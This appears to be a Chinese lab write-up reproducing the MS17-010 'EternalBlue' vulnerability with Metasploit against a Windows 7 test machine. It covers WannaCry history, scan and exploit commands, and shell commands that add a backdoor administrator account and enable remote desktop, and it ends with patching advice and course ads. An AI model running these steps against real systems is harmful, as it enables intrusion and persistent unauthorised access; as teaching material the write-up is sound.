热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

[漏洞复现]MS17010基于"永恒之蓝"实现WindowsGetshell

这枚WannaCry勒索病毒,就是黑客拿着美国安全局泄露的永恒之蓝攻击代码进行研制,
1、漏洞概述

2017年5月,被称为近10年来影响范围最广泛“最嚣张”的WannaCry勒索病毒席卷全球,据统计,全球共有150多个国家超30万台终端被感染,波及政府、学校、医院、金融、航班等各行各业。

技术分享图片


一旦中了WannaCry病毒,则电脑文件会被“加密劫持”,黑客要求受害者支付高昂赎金(比特币)才能拿到解密秘钥。当时互联网上有很多人确实尝试通过支付赎金解决“被挟持的电脑”,毕竟多年的工作和学习资料比起赎金来讲,价值更大。而实际上,很多人即便打钱过去,也无济于事。

为什么WannaCry病毒能够在短短一个月时间,对全球造成这么大的危害?这里就必须提到今天的主角:“永恒之蓝”。

时间追溯到2016年,全球神秘黑客组织影子经纪人( Shadow Brokers)入侵了另外一支技术高超的黑客团队 
方程式组织(Equation Group),并拿到后者部分泄密武器。而方程式组织其实便是NSA(美国国家安全局)旗下的黑客团队,正因此,由国家支持的“核武器级网络军火库”正式浮出水面。

Shadow Brokers在拿到这批武器之后,本来打算以100万比特币(当时价值5亿美元)出售这批“网络军火库”,但最终没有人支付这笔天价费用。

直到2017年4月14号,Shadow Brokers干脆直接在Github上公开整个武器库,大量的针对Windows零日漏洞攻击武器被公开,其中,就包括了上面提到的“永恒之蓝”渗透代码。(Eternalblue) 

技术分享图片


绕了这么一大圈,其实就是想告诉大家一点:

这枚WannaCry勒索病毒,就是黑客拿着美国安全局泄露的永恒之蓝攻击代码进行研制,并进行大肆勒索传播。

关于这一点,微软于2017年5月也公开指责NSA:“美国安全局正是全球勒索病毒的发源地,政府所持有的零日漏洞被泄露到公共领域,造成不可损失的破坏”

直到现在,很多普通用户仍然单方面吐槽“这是因为Windows系统不够安全”,把问题直接归结于微软。而实际上,在这件事情上,微软才是真正的“背锅侠”,因为Windows系统在2017年3月14号就早早推送了MS17-010的安全更新,若用户打上这个补丁,就可以避免这次攻击。但是,大量的普通用户没有更新打补丁的习惯,更不用说那些采用Ghost盗版系统的用户了。


技术分享图片


虽然很多人已经从各种新闻报道和“个人经历”已经知晓这枚病毒的威力,但是在这里我们还是花了很多给大家普及了它的来龙去脉,并在这里给大家一个观点:

[WannaCry事件] 是21世纪网络安全领域的一个标志性事件,意味着:

  • 国家级别的网络安全对抗早就在秘密展开了,现在被一些黑客组织“戳破”了;

  • 黑客攻击事件已经完全渗透到真实世界里,“比特世界”和“原子世界”边界彻底被打破;

  • 谁掌握零日漏洞以及对应的攻击武器,谁在“第五空间”就有话语权;

  • 类似WannaCry的病毒会越来越多,并且频率越来越高,例如Bad Rabbit、NotPetya……


2、漏洞复现环境

Kali Linux 2017.03 + Windows 7 sp1 
渗透机:Kali Linux (ip:172.16.70.216) 
靶机:Windows 7 sp1 (ip:172.16.70.199)

永恒之蓝漏洞刚出来的时候,当时很多人是用Shadow Brokers泄露的NSA原生攻击工具来测试,通过“ Fuzzbunch + Eternalblue 组合拳 ”,虽然可以做出getshell效果,但是整个实现过程非常麻烦,不太适合安全新手进行快速实践。到了Kali Linux 2017.03和Kali Linux 2018版,神器Metasploit直接集成了MS17-010的渗透测试代码,针对Win7和Server2008可以实现getshell,几分钟内就可以将完成整个漏洞复现过程。

注:此实验环境所用渗透机和靶机,跟之前文章所分享一致,可以参考往期推文,并下载所需镜像=>

[漏洞复现] CVE-2017-11882 通杀所有Office版本


3、实验流程

①登录Kali Linux,进入MSF框架,搜索ms17-010代码

msfconsole 
msf > search ms17_010 


技术分享图片


这里可以得到两个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,exploit/windows/smb/ms17_010_eternalblue是永恒之蓝渗透代码,一般配合使用,前者先扫描,若显示有漏洞,再进行渗透。

②使用ms17-010扫描模块,对靶机Win7进行扫描

使用模块 
msf > use auxiliary/scanner/smb/smb_ms17_010 
设置目标IP或网段 
msf auxiliary(smb_ms17_010) > set RHOSTS 172.16.70.199 
执行扫描 
msf auxiliary(smb_ms17_010) > run 


技术分享图片


③使用ms17-010渗透模块,对靶机Win7进行渗透

使用模块 
msf > use exploit/windows/smb/ms17_010_eternalblue 
查看可设置的选项 
msf exploit(ms17_010_eternalblue) > show options 
设置渗透目标ip 
msf exploit(ms17_010_eternalblue) > set RHOST 172.16.70.199 
执行渗透 
msf exploit(ms17_010_eternalblue) > exploit 

技术分享图片


技术分享图片

技术分享图片


技术分享图片


从最终效果来看,此时Kali Linux通过MS17-010渗透代码,直接拿到Win7的Shell,之后便可以通过Shell对目标靶机进行控制。

④通过Shell对靶机Win7进行控制

创建用户名密码 blue/blue 
net user blue blue /add 
将用户blue添加入管理组 
net localgroup administrators blue /add 
开启远程桌面功能 
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 
Kali远程桌面连接Win7 
rdesktop 172.16.70.199:3389

技术分享图片


技术分享图片


技术分享图片


可以看到,最终Kali通过shell新建了用户,并通过远程桌面连接到目标靶机上。 
当然,上面这是一个简单的演示,告诉大家这个漏洞很危险,真正的黑客能做的事情更多,所以还是要多打补丁或按照安全软件。

4、漏洞修复

①在线更新;开启Windows Update更新。 
②打补丁;此漏洞对应的微软补丁地址:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010


=====================

【职位套餐】

①《CCIE魔鬼训练营套餐》:零基础到CCIE网络安全专家,包含CCNA/CCNP/CCIE不同等级的课程内容,涉及R&S、ISP、Security、渗透测试等课程内容,行业最经典,优惠幅度最大。课程链接:http://edu.51cto.com/pack/view/id-255.html

②《Web安全工程师》:掌握Web漏洞扫描、信息探测、SQL注入、文件上传、Webshell木马、远程执行、XSS跨站脚本攻击、CSRF跨站请求伪造等核心技能。课程链接:http://edu.51cto.com/topic/1181.html

③《高级Web安全工程师》:掌握Python编程、Web开发(Django)、Web安全,通往高级Web安全工程师。课程链接:http://edu.51cto.com/topic/1183.html


[漏洞复现] MS17-010 基于"永恒之蓝"实现Windows Getshell


推荐阅读
  • Vulnhub DC3 实战记录与分析
    本文记录了在 Vulnhub DC3 靶机上的渗透测试过程,包括漏洞利用、内核提权等关键步骤,并总结了实战经验和教训。 ... [详细]
  • 本文详细介绍了PHP中的几种超全局变量,包括$GLOBAL、$_SERVER、$_POST、$_GET等,并探讨了AJAX的工作原理及其优缺点。通过具体示例,帮助读者更好地理解和应用这些技术。 ... [详细]
  • 本文概述了在GNU/Linux系统中,动态库在链接和运行阶段的搜索路径及其指定方法,包括通过编译时参数、环境变量及系统配置文件等方式来控制动态库的查找路径。 ... [详细]
  • 本文详细介绍了如何使用Rufus工具制作一个兼容UEFI启动模式的Windows Server 2008 R2安装U盘,包括必要的软件和步骤。 ... [详细]
  • 实现Win10与Linux服务器的SSH无密码登录
    本文介绍了如何在Windows 10环境下使用Git工具,通过配置SSH密钥对,实现与Linux服务器的无密码登录。主要步骤包括生成本地公钥、上传至服务器以及配置服务器端的信任关系。 ... [详细]
  • 本文由chszs撰写,详细介绍了Apache Mina框架的核心开发流程及自定义协议处理方法。文章涵盖从创建IoService实例到协议编解码的具体步骤,适合希望深入了解Mina框架应用的开发者。 ... [详细]
  • 汇总了2023年7月7日最新的网络安全新闻和技术更新,包括最新的漏洞披露、工具发布及安全事件。 ... [详细]
  • 本报告记录了嵌入式软件设计课程中的第二次实验,主要探讨了使用KEIL V5开发环境和ST固件库进行GPIO控制及按键响应编程的方法。通过实际操作,加深了对嵌入式系统硬件接口编程的理解。 ... [详细]
  • 本文回顾了作者在求职阿里和腾讯实习生过程中,从最初的迷茫到最后成功获得Offer的心路历程。文中不仅分享了个人的面试经历,还提供了宝贵的面试准备建议和技巧。 ... [详细]
  • JUnit下的测试和suite
    nsitionalENhttp:www.w3.orgTRxhtml1DTDxhtml1-transitional.dtd ... [详细]
  • 本文详细探讨了BCTF竞赛中窃密木马题目的解题策略,重点分析了该题目在漏洞挖掘与利用方面的技巧。 ... [详细]
  • 2019-2020学年 20174325 叶竞蔚 《网络对抗技术》实验六:Metasploit基础应用
    本实验旨在掌握Metasploit框架的基本应用方法,重点学习三种常见的攻击方式及其实施思路。实验内容包括一次主动攻击(如MS08-067)、一次针对浏览器的攻击(如MS11-050)以及一次针对客户端的攻击(如Adobe漏洞利用)。此外,还包括成功应用一个辅助模块。 ... [详细]
  • 本文探讨了Java编程语言中常用的两个比较操作符==和equals方法的区别及其应用场景。通过具体示例分析,帮助开发者更好地理解和使用这两个概念,特别是在处理基本数据类型和引用数据类型的比较时。 ... [详细]
  • 本文详细介绍了在PHP中如何获取和处理HTTP头部信息,包括通过cURL获取请求头信息、使用header函数发送响应头以及获取客户端HTTP头部的方法。同时,还探讨了PHP中$_SERVER变量的使用,以获取客户端和服务器的相关信息。 ... [详细]
  • 探讨密码安全的重要性
    近期,多家知名网站如CSDN、人人网、多玩、开心网等的数据库相继被泄露,其中大量用户的账户密码因明文存储而暴露无遗。本文将探讨黑客获取密码的常见手段,网站如何安全存储用户信息,以及用户应如何保护自己的密码。 ... [详细]
author-avatar
麦土豆1937
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有